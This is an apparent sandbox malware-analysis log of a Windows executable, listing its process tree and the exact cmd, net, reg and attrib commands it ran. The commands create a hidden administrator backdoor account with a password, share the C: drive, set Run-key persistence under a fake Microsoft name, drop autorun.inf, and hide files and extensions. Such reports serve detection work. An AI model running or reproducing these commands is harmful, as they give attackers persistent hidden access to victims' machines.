PID 5112 wrote to memory of 4644	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	114
PID 5112 wrote to memory of 4644	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	114
PID 5112 wrote to memory of 4892	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	121
PID 5112 wrote to memory of 4892	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	121
PID 5112 wrote to memory of 4892	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	121
PID 5112 wrote to memory of 3532	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	116
PID 5112 wrote to memory of 3532	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	116
PID 5112 wrote to memory of 3532	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	116
PID 5112 wrote to memory of 2036	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	117
PID 5112 wrote to memory of 2036	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	117
PID 5112 wrote to memory of 2036	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	117
PID 5112 wrote to memory of 5064	5112	ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe	118

Views/modifies file attributes 1 TTPs 7 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
4240	attrib.exe
1124	attrib.exe
2736	attrib.exe
3744	attrib.exe
1548	attrib.exe
1644	attrib.exe
1444	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe
"C:\Users\Admin\AppData\Local\Temp\ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe"
1⤵
- Drops autorun.inf file
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Users\Admin\AppData\Local\Temp\ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3472
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Users\Admin\AppData\Local\Temp\ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:4240
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c start /b /max .
  2⤵
  - Modifies registry class
  PID:4960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c tskill taskmagr
  2⤵
  PID:1284
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net share SYS_C$=C:\
  2⤵
  PID:4092
- - C:\Windows\SysWOW64\net.exe
    net share SYS_C$=C:\
    3⤵
    PID:1964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 share SYS_C$=C:\
      4⤵
      PID:3096
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c cd C:\ & del *.lnk
  2⤵
  PID:840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c MKDIR "C:\Program File"
  2⤵
  PID:2304
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c COPY "C:\Users\Admin\AppData\Local\Temp\ce31e3a066cf6e9f585474d7b80f31b1f9da81c168bcdbe5cfdda1b7a71a9d5b.exe" "C:\Program File\Microsoft\MicrosoftSafety.exe"
  2⤵
  PID:176
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c MKDIR "C:\Program File\Microsoft"
  2⤵
  PID:4232
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Program File"
  2⤵
  PID:224
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Program File"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1124
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H "C:\Program File\Microsoft"
  2⤵
  PID:2168
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H "C:\Program File\Microsoft"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:2736
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H C:\C0MM
  2⤵
  PID:3580
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H C:\C0MM
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +H C:\C0MM\C0MM
  2⤵
  PID:1332
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +H C:\C0MM\C0MM
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:1444
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net users /add SYS_4321 passPass
  2⤵
  PID:2600
- - C:\Windows\SysWOW64\net.exe
    net users /add SYS_4321 passPass
    3⤵
    PID:1508
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 users /add SYS_4321 passPass
      4⤵
      PID:4924
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +h +r C:\autorun.inf
  2⤵
  PID:3676
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h +r C:\autorun.inf
    3⤵
    - Sets file to hidden
    - Drops autorun.inf file
    - Views/modifies file attributes
    PID:3744
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f
  2⤵
  PID:4644
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v SYS_4321 /t REG_DWORD /d 0 /f
    3⤵
    PID:5036
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f
  2⤵
  PID:3532
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CLASSES_ROOT\Network\SharingHandler" /v "" /t REG_SZ /d "" /f
    3⤵
    - Modifies registry class
    PID:4580
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:3168
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:5064
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:2788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net localgroup administrators /add SYS_4321
  2⤵
  PID:4892
- - C:\Windows\SysWOW64\net.exe
    net localgroup administrators /add SYS_4321
    3⤵
    PID:3932
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 localgroup administrators /add SYS_4321
      4⤵
      PID:1936
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " %homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2252
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d " C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4812
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f
  2⤵
  PID:4408
- - C:\Windows\SysWOW64\reg.exe
    reg DELETE "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IniFileMapping\Autorun.inf" /f
    3⤵
    PID:1260
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net users SYS_4321 passPass
  2⤵
  PID:4384
- - C:\Windows\SysWOW64\net.exe
    net users SYS_4321 passPass
    3⤵
    PID:372
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 users SYS_4321 passPass
      4⤵
      PID:4828
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib -r -a C:\autorun.inf
  2⤵
  PID:3692
- - C:\Windows\SysWOW64\attrib.exe
    attrib -r -a C:\autorun.inf
    3⤵
    - Views/modifies file attributes
    PID:1548
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f
  2⤵
  PID:4576
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system" /v shutdownwithoutlogon /d 0 /t REG_DWORD /f
    3⤵
    PID:4172
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:380
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2148
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4016
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4352
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4400
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4396
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3468
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2108
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2736
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:3660
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4364
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1476
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3580
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4088
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4660
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:3156
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:3168
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2968
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:428
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3532
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4212
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3928
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:2992
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4596
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4848
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:3684
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4944
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4488
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2948
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3096
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1892
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1220
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:116
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4960
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4352
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:1872
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2200
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:856
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:948
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1272
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:3920
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4976
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4208
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:360
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2188
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:4168
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:1284
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2660
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:696
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1248
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:3696
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3660
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:3520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3448
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:2480
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:2524
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:4056
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:3028
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:4424
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2644
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:3820
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:4048
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:2692
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1244
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:792
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "C:\Program File\Microsoft\MicrosoftSafety.exe" /f
    3⤵
    - Adds Run key to start application
    PID:1984
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
  2⤵
  PID:1640
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t REG_DWORD /d 0 /f
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    PID:4132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
  2⤵
  PID:1496
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 1 /f
    3⤵
    - Modifies visibility of file extensions in Explorer
    PID:4912
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Microsoft /d "%homedrive%\Program File\Microsoft\MicrosoftSafety.exe" /f
  2⤵
  PID:4024
- - C:\Windows\SysWOW64\reg.exe
